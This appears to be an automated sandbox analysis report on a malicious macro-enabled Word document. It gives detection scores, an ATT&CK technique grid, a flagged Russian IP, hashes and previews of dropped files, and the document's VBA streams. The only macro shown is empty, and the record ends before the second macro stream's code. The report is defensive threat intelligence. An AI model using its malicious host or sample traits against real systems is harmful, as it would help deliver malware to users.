Virtualization/Sandbox Evasion
Distributed Component Object ModelInput CaptureProtocol ImpersonationTraffic DuplicationData Destruction
Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon ScriptSoftware PackingLSA Secrets1
Application Window Discovery
SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC ScriptsSteganographyCached Domain Credentials1
Remote System Discovery
VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup ItemsCompile After DeliveryDCSync2
File and Directory Discovery
Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/JobIndicator Removal from ToolsProc Filesystem13
System Information Discovery
Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand
SourceDetectionScannerLabelLink
Ham9SAD0Ou.doc42%ReversingLabsScript-Macro.Trojan.Heuristic
Ham9SAD0Ou.doc100%AviraHEUR/Macro.Agent
Ham9SAD0Ou.doc100%Joe Sandbox ML
SourceDetectionScannerLabelLink
C:\Users\user\Desktop\~WRD0000.tmp100%AviraHEUR/Macro.Downloader.MRSY.Gen
C:\Users\user\Desktop\~WRD0000.tmp100%Joe Sandbox ML
No Antivirus matches
No Antivirus matches
SourceDetectionScannerLabelLink
http://nuget.org/NuGet.exe0%URL Reputationsafe
https://contoso.com/0%URL Reputationsafe
https://nuget.org/nuget.exe0%URL Reputationsafe
https://contoso.com/License0%URL Reputationsafe
https://contoso.com/Icon0%URL Reputationsafe
https://support.mozilla.org0%URL Reputationsafe
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
No contacted domains info
NameSourceMaliciousAntivirus DetectionReputation
http://java.sun.comexplorer.exe, 00000005.00000002.1091711614.00000000002CE000.00000004.00000020.00020000.00000000.sdmpfalse
    unknown
    http://nuget.org/NuGet.exepowershell.exe, 00000002.00000002.389315931.0000000012B61000.00000004.00000800.00020000.00000000.sdmpfalse
    • URL Reputation: safe
    unknown
    http://www.piriform.comexplorer.exe, 00000005.00000002.1092043382.0000000003CD0000.00000004.00000020.00020000.00000000.sdmpfalse
      unknown
      http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanervpowershell.exe, 00000002.00000002.382279546.000000000033E000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.1092394208.00000000062B0000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.1091885223.0000000002600000.00000004.00000020.00020000.00000000.sdmpfalse
        unknown
        http://www.piriform.com/ccleanermexplorer.exe, 00000005.00000002.1091711614.000000000034A000.00000004.00000020.00020000.00000000.sdmpfalse
          unknown
          http://89.23.98.98/explorer.exe, 00000004.00000002.380623964.000000000020B000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.380623964.00000000001FC000.00000004.00000020.00020000.00000000.sdmpfalse
            unknown
            http://www.piriform.com/ccexplorer.exe, 00000005.00000002.1092043382.0000000003CD0000.00000004.00000020.00020000.00000000.sdmpfalse
              unknown
              https://contoso.com/powershell.exe, 00000002.00000002.389315931.0000000012B61000.00000004.00000800.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              unknown
              https://nuget.org/nuget.exepowershell.exe, 00000002.00000002.389315931.0000000012B61000.00000004.00000800.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              unknown
              https://contoso.com/Licensepowershell.exe, 00000002.00000002.389315931.0000000012B61000.00000004.00000800.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              unknown
              https://contoso.com/Iconpowershell.exe, 00000002.00000002.389315931.0000000012B61000.00000004.00000800.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              unknown
              http://www.piriform.com/ccleanerexplorer.exe, 00000005.00000002.1091711614.000000000034A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.1092394208.00000000062B0000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.1091885223.0000000002600000.00000004.00000020.00020000.00000000.sdmpfalse
                unknown
                http://www.autoitscript.com/autoit3explorer.exe, 00000005.00000002.1091711614.00000000002CE000.00000004.00000020.00020000.00000000.sdmpfalse
                  unknown
                  https://support.mozilla.orgexplorer.exe, 00000005.00000002.1091711614.00000000002CE000.00000004.00000020.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  unknown
                  http://www.piriform.com/ccleanervexplorer.exe, 00000005.00000002.1092043382.0000000003CD0000.00000004.00000020.00020000.00000000.sdmpfalse
                    unknown
                    http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000002.00000002.385717407.0000000002B31000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    unknown
                    • No. of IPs < 25%
                    • 25% < No. of IPs < 50%
                    • 50% < No. of IPs < 75%
                    • 75% < No. of IPs
                    IPDomainCountryFlagASNASN NameMalicious
                    89.23.98.98
                    unknownRussian Federation
                    48687MAXITEL-ASRUtrue
                    Joe Sandbox version:41.0.0 Charoite
                    Analysis ID:1540325
                    Start date and time:2024-10-23 17:29:45 +02:00
                    Joe Sandbox product:CloudBasic
                    Overall analysis duration:0h 8m 24s
                    Hypervisor based Inspection enabled:false
                    Report type:full
                    Cookbook file name:defaultwindowsofficecookbook.jbs
                    Analysis system description:Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
                    Number of analysed new started processes analysed:12
                    Number of new started drivers analysed:0
                    Number of existing processes analysed:0
                    Number of existing drivers analysed:0
                    Number of injected processes analysed:0
                    Technologies:
                    • HCA enabled
                    • EGA enabled
                    • GSI enabled (VBA)
                    • AMSI enabled
                    Analysis Mode:default
                    Analysis stop reason:Timeout
                    Sample name:Ham9SAD0Ou.doc
                    renamed because original name is a hash value
                    Original Sample Name:6005516d783bde80a25763acbb85230b.docx.doc
                    Detection:MAL
                    Classification:mal100.spyw.expl.evad.winDOC@6/15@0/1
                    EGA Information:Failed
                    HCA Information:
                    • Successful, ratio: 100%
                    • Number of executed functions: 1
                    • Number of non-executed functions: 2
                    Cookbook Comments:
                    • Found application associated with file extension: .doc
                    • Found Word or Excel or PowerPoint or XPS Viewer
                    • Attach to Office via COM
                    • Scroll down
                    • Close Viewer
                    • Override analysis time to 240s for sample based on specific behavior
                    • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, conhost.exe, svchost.exe
                    • Execution Graph export aborted for target powershell.exe, PID 3496 because it is empty
                    • Not all processes where analyzed, report is missing behavior information
                    • Report size exceeded maximum capacity and may have missing behavior information.
                    • Report size getting too big, too many NtEnumerateKey calls found.
                    • Report size getting too big, too many NtOpenKey calls found.
                    • Report size getting too big, too many NtOpenKeyEx calls found.
                    • Report size getting too big, too many NtQueryValueKey calls found.
                    • VT rate limit hit for: Ham9SAD0Ou.doc
                    TimeTypeDescription
                    11:30:47API Interceptor42x Sleep call for process: powershell.exe modified
                    11:30:48API Interceptor6809x Sleep call for process: explorer.exe modified
                    No context
                    No context
                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                    MAXITEL-ASRUfile.dllGet hashmaliciousMatanbuchusBrowse
                    • 89.23.113.220
                    file.dllGet hashmaliciousMatanbuchusBrowse
                    • 89.23.113.220
                    zufmUwylvo.exeGet hashmaliciousFlesh Stealer, XmrigBrowse
                    • 89.23.100.233
                    System.exeGet hashmaliciousFlesh Stealer, XmrigBrowse
                    • 89.23.100.233
                    SecuriteInfo.com.Trojan.PWS.Siggen3.38160.4541.30793.exeGet hashmaliciousUnknownBrowse
                    • 89.23.100.233
                    tjigfd64.exeGet hashmaliciousLummaC StealerBrowse
                    • 94.158.209.5
                    3plugin29563.exeGet hashmaliciousAmadeyBrowse
                    • 89.23.103.42
                    setup.exeGet hashmaliciousRedLineBrowse
                    • 89.23.97.185
                    http://go.tenoaksadvisors.com.Get hashmaliciousUnknownBrowse
                    • 89.23.110.52
                    TYg9Jx5SUa.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                    • 89.23.100.125
                    No context
                    No context
                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):64
                    Entropy (8bit):0.34726597513537405
                    Encrypted:false
                    SSDEEP:3:Nlll:Nll
                    MD5:446DD1CF97EABA21CF14D03AEBC79F27
                    SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
                    SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
                    SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
                    Malicious:false
                    Reputation:high, very likely benign file
                    Preview:@...e...........................................................
                    Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                    File Type:Composite Document File V2 Document, Cannot read section info
                    Category:dropped
                    Size (bytes):22016
                    Entropy (8bit):4.564975800158306
                    Encrypted:false
                    SSDEEP:192:+nt6B8WjSCtCHu+xhJJmkNCaot6f8QdktCHu+xhJJmkNCa:StpePtKxhLlNotjQetKxhLlN
                    MD5:2856431DDB994D0CD47ED88569B76D1C
                    SHA1:351D9BE0E261202C8363763339EBEC47FA250C17
                    SHA-256:96BBF4C4C28C0363DE4FDFD6258BDB0FAF52D391C1AF8ACD3756FAA407DEADB0
                    SHA-512:D17B1F5079D7CF427C3B0042587B494D8C9B865445BAC9E824188BB2CF75EA2F8D24D1FB64BE45341C4470ACA7DF9DB23C7E4E09308BA92C30DBB972E1D7FE04
                    Malicious:false
                    Reputation:low
                    Preview:......................>.......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................'...............)........................... ...!..."...#...$...%...&...(...............................................................................................................................................................................................................................................................................................................................................
                    Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                    File Type:data
                    Category:dropped
                    Size (bytes):1024
                    Entropy (8bit):0.05390218305374581
                    Encrypted:false
                    SSDEEP:3:ol3lYdn:4Wn
                    MD5:5D4D94EE7E06BBB0AF9584119797B23A
                    SHA1:DBB111419C704F116EFA8E72471DD83E86E49677
                    SHA-256:4826C0D860AF884D3343CA6460B0006A7A2CE7DBCCC4D743208585D997CC5FD1
                    SHA-512:95F83AE84CAFCCED5EAF504546725C34D5F9710E5CA2D11761486970F2FBECCB25F9CF50BBFC272BD75E1A66A18B7783F09E1C1454AFDA519624BC2BB2F28BA4
                    Malicious:false
                    Reputation:high, very likely benign file
                    Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                    Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                    File Type:data
                    Category:dropped
                    Size (bytes):1024
                    Entropy (8bit):0.05390218305374581
                    Encrypted:false
                    SSDEEP:3:ol3lYdn:4Wn
                    MD5:5D4D94EE7E06BBB0AF9584119797B23A
                    SHA1:DBB111419C704F116EFA8E72471DD83E86E49677
                    SHA-256:4826C0D860AF884D3343CA6460B0006A7A2CE7DBCCC4D743208585D997CC5FD1
                    SHA-512:95F83AE84CAFCCED5EAF504546725C34D5F9710E5CA2D11761486970F2FBECCB25F9CF50BBFC272BD75E1A66A18B7783F09E1C1454AFDA519624BC2BB2F28BA4
                    Malicious:false
                    Reputation:high, very likely benign file
                    Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                    File Type:very short file (no magic)
                    Category:dropped
                    Size (bytes):1
                    Entropy (8bit):0.0
                    Encrypted:false
                    SSDEEP:3:U:U
                    MD5:C4CA4238A0B923820DCC509A6F75849B
                    SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                    SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                    SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                    Malicious:false
                    Preview:1
                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                    File Type:very short file (no magic)
                    Category:dropped
                    Size (bytes):1
                    Entropy (8bit):0.0
                    Encrypted:false
                    SSDEEP:3:U:U
                    MD5:C4CA4238A0B923820DCC509A6F75849B
                    SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                    SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                    SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                    Malicious:false
                    Preview:1
                    Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                    File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Fri Aug 11 15:42:05 2023, mtime=Fri Aug 11 15:42:05 2023, atime=Wed Oct 23 14:30:43 2024, length=15661, window=hide
                    Category:dropped
                    Size (bytes):1014
                    Entropy (8bit):4.53058406315058
                    Encrypted:false
                    SSDEEP:12:83gYFgXg/XAlCPCHaXIBPB/Dr8xX+W6csOQoCicvbQBnGloiDtZ3YilMMEpxRljI:83g8/XTY9xO8hoJeMB0oiDv3q/57u
                    MD5:10522B941D688AE1D25B0C385E52A41B
                    SHA1:3BE8783A1289D9A30CEA65920ED84D432DB38D73
                    SHA-256:A46589A18A0A4158A21E1A76B736BFEA37FFC8B6BCC4A8151D2499A059B4A633
                    SHA-512:3018E3999269FBB6696D1089F96DCD91EC90B1BEADC71B4EBDC9719F87594598E1113A22261E63B977C100D2C1DCB35FCB5B5791BA2718008B51EA5B92B95C57
                    Malicious:false
                    Preview:L..................F.... .....=.r.....=.r.......`%..-=...........................P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X*...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1.....WY.{..user.8......QK.XWY.{*...&=....U...............A.l.b.u.s.....z.1......WD...Desktop.d......QK.X.WD.*..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.....f.2.-=..WY.{ .HAM9SA~1.DOC..J.......WC..WC.*.........................H.a.m.9.S.A.D.0.O.u...d.o.c.......x...............-...8...[............?J......C:\Users\..#...................\\888683\Users.user\Desktop\Ham9SAD0Ou.doc.%.....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.H.a.m.9.S.A.D.0.O.u...d.o.c.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1.0.0.6.............`.......X.......888683..........D_....3N...W...9..W.e8...8.....[D_....3N...W...9..W.e8
                    Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                    File Type:Generic INItialization configuration [folders]
                    Category:dropped
                    Size (bytes):54
                    Entropy (8bit):4.643776391052359
                    Encrypted:false
                    SSDEEP:3:M12Ic2oAeFFom4Oh2oAeFFov:MEIc2oAMFNh2oAMFy
                    MD5:17EDF2DF72D278B01A81667305F2902F
                    SHA1:CE069F8F7C82DF91FFF35FC150CBA46135F5771E
                    SHA-256:650C8200B5A30588CF167C67E120A2FB92654192E3E2669F508A1C2B2A41A445
                    SHA-512:78C978E292D9486194CC7F438ED91677D1915FC3923B7B424C79A9FB709BFA4E5049B5BF1B519D8114397D7022851DB853C3A08BA89C61747ED3249FBE27D080
                    Malicious:false
                    Preview:[doc]..Ham9SAD0Ou.LNK=0..[folders]..Ham9SAD0Ou.LNK=0..
                    Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                    File Type:data
                    Category:dropped
                    Size (bytes):162
                    Entropy (8bit):2.4797606462020307
                    Encrypted:false
                    SSDEEP:3:vrJlaCkWtVyHlqlzl0pbklMWjV4lc+/dllln:vdsCkWtWYlz21kF2JV/l
                    MD5:2CF7D3B8DED3F1D5CE1AC92F3E51D4ED
                    SHA1:95E13378EA9CACA068B2687F01E9EF13F56627C2
                    SHA-256:60DF94CDE4FD9B4A73BB13775079D75CE954B75DED5A2878277FA64AD767CAB1
                    SHA-512:2D5797FBBE44766D93A5DE3D92911358C70D8BE60D5DF542ECEDB77D1195DC1EEF85E4CA1445595BE81550335A20AB3F11B512385FE20F75B1E269D6AB048E0A
                    Malicious:false
                    Preview:.user..................................................A.l.b.u.s.............p........1...............2..............@3...............3......z.......p4......x...
                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):6045
                    Entropy (8bit):3.58242373319027
                    Encrypted:false
                    SSDEEP:96:HvhQCwO4IYqvsqvJCwo5etz5/RHWipz5/RHyic:HvWko5etRYipRMic
                    MD5:35F273A66F3E4B45906C8BBCB389B0F2
                    SHA1:E69A7D327806899048DEE8682B4B9FD29E0739F5
                    SHA-256:5E8FE7386E95D3AFC64497D80C04E677B4E324CE304E2F2F5D344C9ACB349460
                    SHA-512:D382C18EF25CB1F94A0CBA43FF0ABFB4DD1023D7EE02F82B4AB825E884455A1DB39962BC0FDF5D25796E50E722E0D5418AE7A1D7D4D25340CD093E94CBA19E85
                    Malicious:false
                    Preview:...................................FL..................F.".. .....8.D................................................P.O. .:i.....+00.../C:\...................\.1.....WY.{. PROGRA~3..D.......:..WY.{*...k.....................P.r.o.g.r.a.m.D.a.t.a.....X.1......W.x. MICROS~1..@.......:...W.x*...l.....................M.i.c.r.o.s.o.f.t.....R.1.....wJ;.. Windows.<.......:..wJ;.*.........................W.i.n.d.o.w.s.......1......:((..STARTM~1..j.......:...:((*...................@.....S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.....~.1......WD...Programs..f.......:...WD.*...................<.....P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.......1.....xJu=..ACCESS~1..l.......:..wJr.*...................B.....A.c.c.e.s.s.o.r.i.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.1.....j.1......W.v..WINDOW~1..R.......:.,.W.v*.........................W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....v.2......W.v .WINDOW~2.LNK..Z.......:.,.W.v*....]....................W.i.n.d.o.w.s.
                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):6045
                    Entropy (8bit):3.58242373319027
                    Encrypted:false
                    SSDEEP:96:HvhQCwO4IYqvsqvJCwo5etz5/RHWipz5/RHyic:HvWko5etRYipRMic
                    MD5:35F273A66F3E4B45906C8BBCB389B0F2
                    SHA1:E69A7D327806899048DEE8682B4B9FD29E0739F5
                    SHA-256:5E8FE7386E95D3AFC64497D80C04E677B4E324CE304E2F2F5D344C9ACB349460
                    SHA-512:D382C18EF25CB1F94A0CBA43FF0ABFB4DD1023D7EE02F82B4AB825E884455A1DB39962BC0FDF5D25796E50E722E0D5418AE7A1D7D4D25340CD093E94CBA19E85
                    Malicious:false
                    Preview:...................................FL..................F.".. .....8.D................................................P.O. .:i.....+00.../C:\...................\.1.....WY.{. PROGRA~3..D.......:..WY.{*...k.....................P.r.o.g.r.a.m.D.a.t.a.....X.1......W.x. MICROS~1..@.......:...W.x*...l.....................M.i.c.r.o.s.o.f.t.....R.1.....wJ;.. Windows.<.......:..wJ;.*.........................W.i.n.d.o.w.s.......1......:((..STARTM~1..j.......:...:((*...................@.....S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.....~.1......WD...Programs..f.......:...WD.*...................<.....P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.......1.....xJu=..ACCESS~1..l.......:..wJr.*...................B.....A.c.c.e.s.s.o.r.i.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.1.....j.1......W.v..WINDOW~1..R.......:.,.W.v*.........................W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....v.2......W.v .WINDOW~2.LNK..Z.......:.,.W.v*....]....................W.i.n.d.o.w.s.
                    Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                    File Type:Microsoft Word 2007+
                    Category:dropped
                    Size (bytes):27360
                    Entropy (8bit):7.681713309453544
                    Encrypted:false
                    SSDEEP:384:3eRhBGhv+EhnsZLmMKKmoeqPR/Mf5ORMCYGS9lFePjyibvzSykSli:uREvrhnsZLCpqJ9MCvSFyIyfli
                    MD5:14B6092DB16864060DD81FCA9D30C3A7
                    SHA1:126FD65FB389453250930DBAAF5AF8AD653E3A1D
                    SHA-256:C78770AF0068E84B48E1314382DD54ADD2BD5DFBBA43C1D9E4B790A6816B2DD7
                    SHA-512:93018D93DEA01037B226BC4CF3F79A21B51D1EC8564E51DC1819F1D35A365DF73835A0C596F7F8EFF7F5C170D63AE41B7C6939EEB109862C5DFAC0DD082AF329
                    Malicious:true
                    Preview:PK..........!...E.....#.......[Content_Types].xml ...(....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................T.N.0..#....(v..j.....(...../..B...BY.6e.D...x..g/......`.|.2p.k.f...\.',K(...wP.%$v6...N..RFh..6G..B$5.+.....>Z...g"H.(g ...c..Cp.c..F..(.S.....['S.Xv....&C...HF..inS...(........2..,B.z.>[.;....b..........f........FF......>j..z.........p....p+U.c'......qon7.R..$.o.v.^......_.....u.!z.).8...;.......b.'4MM_[...~5@${..|.....3Lo.....^#%=.I=....+.^.H!......GC.M....'$.......F.4..".XE..R.D.u}PG...F[4.?z.......PK......
                    Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                    File Type:data
                    Category:dropped
                    Size (bytes):162
                    Entropy (8bit):2.4797606462020307
                    Encrypted:false
                    SSDEEP:3:vrJlaCkWtVyHlqlzl0pbklMWjV4lc+/dllln:vdsCkWtWYlz21kF2JV/l
                    MD5:2CF7D3B8DED3F1D5CE1AC92F3E51D4ED
                    SHA1:95E13378EA9CACA068B2687F01E9EF13F56627C2
                    SHA-256:60DF94CDE4FD9B4A73BB13775079D75CE954B75DED5A2878277FA64AD767CAB1
                    SHA-512:2D5797FBBE44766D93A5DE3D92911358C70D8BE60D5DF542ECEDB77D1195DC1EEF85E4CA1445595BE81550335A20AB3F11B512385FE20F75B1E269D6AB048E0A
                    Malicious:false
                    Preview:.user..................................................A.l.b.u.s.............p........1...............2..............@3...............3......z.......p4......x...
                    Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                    File Type:Microsoft Word 2007+
                    Category:dropped
                    Size (bytes):27360
                    Entropy (8bit):7.681713309453544
                    Encrypted:false
                    SSDEEP:384:3eRhBGhv+EhnsZLmMKKmoeqPR/Mf5ORMCYGS9lFePjyibvzSykSli:uREvrhnsZLCpqJ9MCvSFyIyfli
                    MD5:14B6092DB16864060DD81FCA9D30C3A7
                    SHA1:126FD65FB389453250930DBAAF5AF8AD653E3A1D
                    SHA-256:C78770AF0068E84B48E1314382DD54ADD2BD5DFBBA43C1D9E4B790A6816B2DD7
                    SHA-512:93018D93DEA01037B226BC4CF3F79A21B51D1EC8564E51DC1819F1D35A365DF73835A0C596F7F8EFF7F5C170D63AE41B7C6939EEB109862C5DFAC0DD082AF329
                    Malicious:true
                    Antivirus:
                    • Antivirus: Avira, Detection: 100%
                    • Antivirus: Joe Sandbox ML, Detection: 100%
                    Preview:PK..........!...E.....#.......[Content_Types].xml ...(....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................T.N.0..#....(v..j.....(...../..B...BY.6e.D...x..g/......`.|.2p.k.f...\.',K(...wP.%$v6...N..RFh..6G..B$5.+.....>Z...g"H.(g ...c..Cp.c..F..(.S.....['S.Xv....&C...HF..inS...(........2..,B.z.>[.;....b..........f........FF......>j..z.........p....p+U.c'......qon7.R..$.o.v.^......_.....u.!z.).8...;.......b.'4MM_[...~5@${..|.....3Lo.....^#%=.I=....+.^.H!......GC.M....'$.......F.4..".XE..R.D.u}PG...F[4.?z.......PK......
                    Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                    File Type:ASCII text, with CRLF line terminators
                    Category:modified
                    Size (bytes):26
                    Entropy (8bit):3.95006375643621
                    Encrypted:false
                    SSDEEP:3:ggPYV:rPYV
                    MD5:187F488E27DB4AF347237FE461A079AD
                    SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                    SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                    SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                    Malicious:true
                    Preview:[ZoneTransfer]....ZoneId=0
                    File type:Microsoft Word 2007+
                    Entropy (8bit):7.393700777109046
                    TrID:
                    • Word Microsoft Office Open XML Format document with Macro (52004/1) 37.96%
                    • Word Microsoft Office Open XML Format document (49504/1) 36.13%
                    • Word Microsoft Office Open XML Format document (27504/1) 20.07%
                    • ZIP compressed archive (8000/1) 5.84%
                    File name:Ham9SAD0Ou.doc
                    File size:16'687 bytes
                    MD5:6005516d783bde80a25763acbb85230b
                    SHA1:e7a231af0530a09066717d3c1fcd340e215e83d9
                    SHA256:edfc124678400137fbe36333ef1114ebd69dd7448f88c02eb68825a3392773fc
                    SHA512:f7ff78e68a825e496ae1ca920951ebcdcba88a70dc33e36da686e0b2536681b8c6f8ef46caf29a53a5ca83563d34e4ceebefbcea7df001eaee41fc2fa58ac460
                    SSDEEP:192:HNmtebfbsyAAgT3FNQtwVNMZ9zvu/hM2ce5eO23S7Ok0Z/EYaEbLHRf18iNXDMr0:tmtebFgr7XfMDu/y2chC78qazRuijB3T
                    TLSH:2C72BF3FDA00B454C67786BA84AA86F2F6564431870876EF2506E6CD52241D30BE7FCE
                    File Content Preview:PK..........!.|..|............[Content_Types].xml ...(.........................................................................................................................................................................................................
                    Icon Hash:2764a3aaaeb7bdbf
                    Document Type:OpenXML
                    Number of OLE Files:1
                    Has Summary Info:
                    Application Name:
                    Encrypted Document:False
                    Contains Word Document Stream:True
                    Contains Workbook/Book Stream:False
                    Contains PowerPoint Document Stream:False
                    Contains Visio Document Stream:False
                    Contains ObjectPool Stream:False
                    Flash Objects Count:0
                    Contains VBA Macros:True
                    Title:
                    Subject:
                    Author:admin
                    Keywords:
                    Template:fwd.dotm
                    Last Saved By:admin
                    Revion Number:4
                    Total Edit Time:0
                    Create Time:2024-03-26T12:23:00Z
                    Last Saved Time:2024-03-26T21:28:00Z
                    Number of Pages:1
                    Number of Words:0
                    Number of Characters:0
                    Creating Application:Microsoft Office Word
                    Security:0
                    Number of Lines:0
                    Number of Paragraphs:0
                    Thumbnail Scaling Desired:false
                    Company:
                    Contains Dirty Links:false
                    Shared Document:false
                    Changed Hyperlinks:false
                    Application Version:16.0000
                    General
                    Stream Path:VBA/NewMacros
                    VBA File Name:NewMacros.bas
                    Stream Size:961
                    Data ASCII:. . . . . . . . z . . . . . . . . . . . . i . . . . . . . . . . . , : " . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ` . . . . . 4 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                    Data Raw:01 16 03 00 00 f0 00 00 00 7a 02 00 00 d4 00 00 00 88 01 00 00 ff ff ff ff 81 02 00 00 69 03 00 00 00 00 00 00 01 00 00 00 a8 2c 3a 22 00 00 ff ff 03 00 00 00 00 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                    Attribute VB_Name = "NewMacros"
                    Sub fwfashj()
                    '
                    ' fwfashj Macro
                    '
                    '
                    
                    End Sub
                    

                    General
                    Stream Path:VBA/ThisDocument
                    VBA File Name:ThisDocument.cls
                    Stream Size:2096
